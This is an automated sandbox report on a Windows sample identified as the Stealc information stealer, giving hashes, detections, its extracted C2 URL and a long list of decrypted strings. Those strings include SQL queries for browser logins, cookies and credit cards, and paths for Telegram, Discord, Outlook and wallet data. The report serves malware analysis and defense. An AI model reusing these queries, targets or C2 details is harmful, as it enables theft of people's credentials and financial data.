Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546042
MD5:3d17618b1108053c2643a92804657456
SHA1:92d6f817db761936dbe341a58edcfbdb3f778de7
SHA256:06485350aa2fecbc8b68c4bf5e2e507030065fd92794425da145c74b6804c41c
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3D17618B1108053C2643A92804657456)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5456JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5456JoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.7b0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T12:18:21.407485+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749744TCP
                2024-10-31T12:18:59.653745+010020229301A Network Trojan was detected172.202.163.200443192.168.2.749952TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T12:18:08.346910+010020442431Malware Command and Control Activity Detected192.168.2.749702185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.7b0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: INSERT_KEY_HERE
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 30
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 11
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 20
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: 24
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetProcAddress
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: LoadLibraryA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: lstrcatA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: OpenEventA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateEventA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CloseHandle
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Sleep
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetUserDefaultLangID
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: VirtualAllocExNuma
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: VirtualFree
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetSystemInfo
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: VirtualAlloc
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HeapAlloc
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetComputerNameA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: lstrcpyA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetProcessHeap
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetCurrentProcess
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: lstrlenA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ExitProcess
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GlobalMemoryStatusEx
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetSystemTime
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SystemTimeToFileTime
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: advapi32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: gdi32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: user32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: crypt32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ntdll.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetUserNameA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateDCA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetDeviceCaps
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ReleaseDC
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CryptStringToBinaryA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sscanf
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: VMwareVMware
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HAL9TH
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: JohnDoe
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DISPLAY
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %hu/%hu/%hu
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: http://185.215.113.206
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: bksvnsj
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: /6c4adf523b719729.php
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: /746f34465cf17784/
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: tale
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetEnvironmentVariableA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetFileAttributesA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GlobalLock
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HeapFree
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetFileSize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GlobalSize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: IsWow64Process
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Process32Next
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetLocalTime
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: FreeLibrary
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetTimeZoneInformation
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetSystemPowerStatus
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetVolumeInformationA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetWindowsDirectoryA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Process32First
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetLocaleInfoA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetUserDefaultLocaleName
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetModuleFileNameA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DeleteFileA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: FindNextFileA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: LocalFree
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: FindClose
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SetEnvironmentVariableA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: LocalAlloc
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetFileSizeEx
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ReadFile
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SetFilePointer
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: WriteFile
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateFileA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: FindFirstFileA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CopyFileA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: VirtualProtect
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetLastError
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: lstrcpynA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: MultiByteToWideChar
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GlobalFree
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: WideCharToMultiByte
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GlobalAlloc
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: OpenProcess
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: TerminateProcess
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetCurrentProcessId
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: gdiplus.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ole32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: bcrypt.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: wininet.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: shlwapi.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: shell32.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: psapi.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: rstrtmgr.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateCompatibleBitmap
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SelectObject
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BitBlt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DeleteObject
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateCompatibleDC
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipGetImageEncodersSize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipGetImageEncoders
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdiplusStartup
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdiplusShutdown
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipSaveImageToStream
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipDisposeImage
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GdipFree
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetHGlobalFromStream
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CreateStreamOnHGlobal
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CoUninitialize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CoInitialize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CoCreateInstance
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptDecrypt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptSetProperty
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptDestroyKey
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetWindowRect
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetDesktopWindow
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetDC
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CloseWindow
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: wsprintfA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: EnumDisplayDevicesA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetKeyboardLayoutList
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CharToOemW
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: wsprintfW
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RegQueryValueExA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RegEnumKeyExA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RegOpenKeyExA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RegCloseKey
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RegEnumValueA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CryptBinaryToStringA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CryptUnprotectData
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SHGetFolderPathA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ShellExecuteExA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetOpenUrlA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetConnectA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetCloseHandle
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetOpenA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HttpSendRequestA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HttpOpenRequestA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetReadFile
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: InternetCrackUrlA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: StrCmpCA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: StrStrA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: StrCmpCW
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PathMatchSpecA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: GetModuleFileNameExA
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RmStartSession
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RmRegisterResources
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RmGetList
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: RmEndSession
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_open
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_prepare_v2
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_step
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_column_text
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_finalize
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_close
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_column_bytes
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: sqlite3_column_blob
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: encrypted_key
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PATH
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: NSS_Init
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: NSS_Shutdown
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PK11_FreeSlot
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PK11_Authenticate
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: PK11SDR_Decrypt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: C:\ProgramData\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: browser:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: profile:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: url:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: login:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: password:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Opera
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: OperaGX
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Network
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: cookies
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: .txt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: TRUE
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: FALSE
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: autofill
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT name, value FROM autofill
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: history
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: cc
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: name:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: month:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: year:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: card:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Cookies
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Login Data
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Web Data
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: History
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: logins.json
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: formSubmitURL
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: usernameField
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: encryptedUsername
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: encryptedPassword
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: guid
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: cookies.sqlite
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: formhistory.sqlite
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: places.sqlite
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: plugins
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Local Extension Settings
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Sync Extension Settings
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: IndexedDB
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Opera Stable
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Opera GX Stable
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: CURRENT
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: chrome-extension_
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: _0.indexeddb.leveldb
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Local State
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: profiles.ini
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: chrome
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: opera
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: firefox
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: wallets
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %08lX%04lX%lu
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ProductName
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: x32
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: x64
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: ProcessorNameString
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DisplayName
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: DisplayVersion
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Network Info:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - IP: IP?
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Country: ISO?
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: System Summary:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - HWID:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - OS:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Architecture:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - UserName:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Computer Name:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Local Time:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - UTC:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Language:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Keyboards:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Laptop:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Running Path:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - CPU:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Threads:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Cores:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - RAM:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - Display Resolution:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: - GPU:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: User Agents:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Installed Apps:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: All Users:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Current User:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Process List:
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: system_info.txt
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: freebl3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: mozglue.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: msvcp140.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: nss3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: softokn3.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: vcruntime140.dll
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Temp\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: .exe
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: runas
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: open
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: /c start
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %DESKTOP%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %APPDATA%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %LOCALAPPDATA%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %USERPROFILE%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %DOCUMENTS%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %PROGRAMFILES%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %PROGRAMFILES_86%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: %RECENT%
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: *.lnk
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: files
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \discord\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Local Storage\leveldb
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: \Telegram Desktop\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: key_datas
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: D877F783D5D3EF8C*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: map*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: A7FDF864FBC10B77*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: F8806DD0C461824F*
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Telegram
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Tox
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: *.tox
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: *.ini
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Password
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                Source: 0.2.file.exe.7b0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
